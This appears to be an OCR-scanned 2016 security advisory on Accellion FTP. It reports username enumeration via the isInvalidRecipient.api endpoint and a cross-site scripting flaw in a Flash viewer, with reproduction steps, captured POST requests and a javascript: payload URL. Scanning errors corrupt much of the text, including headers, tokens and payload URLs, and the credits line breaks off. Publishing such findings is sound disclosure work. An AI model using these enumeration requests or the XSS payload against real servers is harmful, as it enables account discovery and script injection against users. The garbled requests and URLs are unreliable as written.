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December 06, 2016 


Accellion FTP Multiple Security Vulnerabilities 


SYSTEMS AFFECTED: 


All versions 


Reference: http://www.accellion.com/ 


VULNERABILITY DETAILS: 


Vulnerability #1: Username Enumeration via API 


Accellion allows username enumeration for accounts present on the FTP server. In case a invalid account 
is passed to the server, the server returns the username in response , where as there is no response in case a 
valid username exists 


RISK FACTOR: Medium 

CVSS: AV:N/AC:L/Au:N/C:C/I:N/A:N 

CVE-2016-9499 

URL: https://<server_url>/courier/isInvalidRecipient.api 
Reproduction Steps: 


1. Perform the provide POST request with IP/URL of the server. In case of usernames , provide a list 
of arbitrary user names 

2. Ifan username exist a 0 value is returned in response, which also states that 0 usernames were 
found to be invalid, where as in case of invalid usernames , the number of invalid usernames and 
the list of usernames is returned 


Please find below the snapshots for the POC stated above. 


| @) statistics | +4 Inspectors 


Headers E TextView | SyntaxView " WebForms an HexView alk Auth L Cookies s ron j JSON | XML 


| eee | 

User-Agent: Mozilla/S.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox,’46.0 
lAccept: text/html], application/xhtmi+xml ,application/xm1:q=0.9,*/*:q=0.8 
jAccept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate, br 

Cookie: XSRF-TOKEN=6056c95 8eacé4d05Sebsdieecti277447 c66T46d23c995 bdo02b07 b0esdbd87 a4 
Connection: keep-alive 

Content-Type: application/x-wew-Torm-ur lencoded 

Content-Length: 42 


recipient- p. com, testetest.com 


l|test@test. com —— Only one invalid username, which means the other username is valid 


Valid username response 


Headers | Textview | SyntaxView | WebForms i HexView i Auth FE Cookies E T JSON p YML a 


POST https: // courier /isiInvalidRecipient.api HTTP/1.1 
Host: m 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW6#; rv:46.0) Gecko; 20100101 Firefox; 46.0 
Accept: text/html,application,/xhtml+xml,application,xml1;q=0.9,7/*;q=0.8 
Accept-Language: en-us,en; q=0.5 

Accept-Encoding: gzip, deflate, br 

[cooki @: XSRF-TOKEN=6056cC95 Beace4doss ebS dieectTi2z77447 c66T46d23c995 bdo2bo07 boesdbds7 a4 
Connection: keep-alive 

jcontent-Type: application, x-wew-Torm-ur lencoded 

Content-Length: 37 


reciplient=asdf@afds.com,test@test. com 


Find... (press Ctrl+Enter to highlight all) 


List of i inv alid usernames or accounts connected | 
with LDAP 


Invalid username response 


Successful exploitation of this vulnerability will allow an un-authorized user to enumerate 


username for account present on the FTP server or the LDAP in case if LDAP credentials 
are linked with the server. 


Vulnerability #2: Cross-site Scripting 


Accellion makes use of a flash component by Accusoft's Prizm Content. The flash component provides 
various programing parameters which can be set to add an cross-site scripting payload. Using the 
functionality it’s possible for an external attacker to send victims a link, containing the xss payload. 


RISK FACTOR: Medium 
CVSS: AV:N/AC:L/Au:N/C:C/I:N/A:N 
CVE-2016-9500 

Reproduction Steps: 


1. In a browser open the following URL mentioned below : 


https: //<server_url>/courier/web/VviewerEnterpriseAnnotation. swf ?&trans lationToo l=No&javascriptEven 


ts=YES&reviewTab=Noévi ewlab=NoésearchTab=No&cus tomTabName=test&customTabCategoryName=CLICK%20ME&cu 


stomButtonlUrl=javascript:alert(Cdocument. location)&customButton1Too 1tip=yup&navButton=no&printDocu 


ment=no&zoomButton=no&saveDocumentLocation=http: oogle.com&saveDocument=yes&a&selectedTab=test&but 


tonHomeZoom=No&é&but tonHomeFi t=no&buttonHomeCl ip=no&too lbarButtonsSize=50&customButtonlImage=javascri 
pt:alert(1); 


Custom Button 


| Loading... 


ŒC |Q Æ |Q Search E L e a E T U -O Bs 


© EE OM https Rc ourier/web/ViewerEnterpriseAnnotation. 


https a courierweb/ViewerEnterpriseAnnotation.swf?&translationTool=No&javascriptEvents=YES&reviewTab=No& 
viewTab=No&searchTab=No&customTabName=HOME&customTabCategoryName=CLICK%20ME& 
customButton1Url=javascript:alet%28document.location%29&customButton1Tooltip=yup&navButton=no&printDocument=n0& 
zoomButton=no&saveDocumentLocation=http://google.com&saveDocument=yes&selectedTabD=HOME&buttonHomeZoom=No& 
buttonHomeFit=no&buttonHomeClip=no&toolbarButtonSize=100&sendViewerEvents=Yes&alert=1 


a 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Qualys Application Security and 
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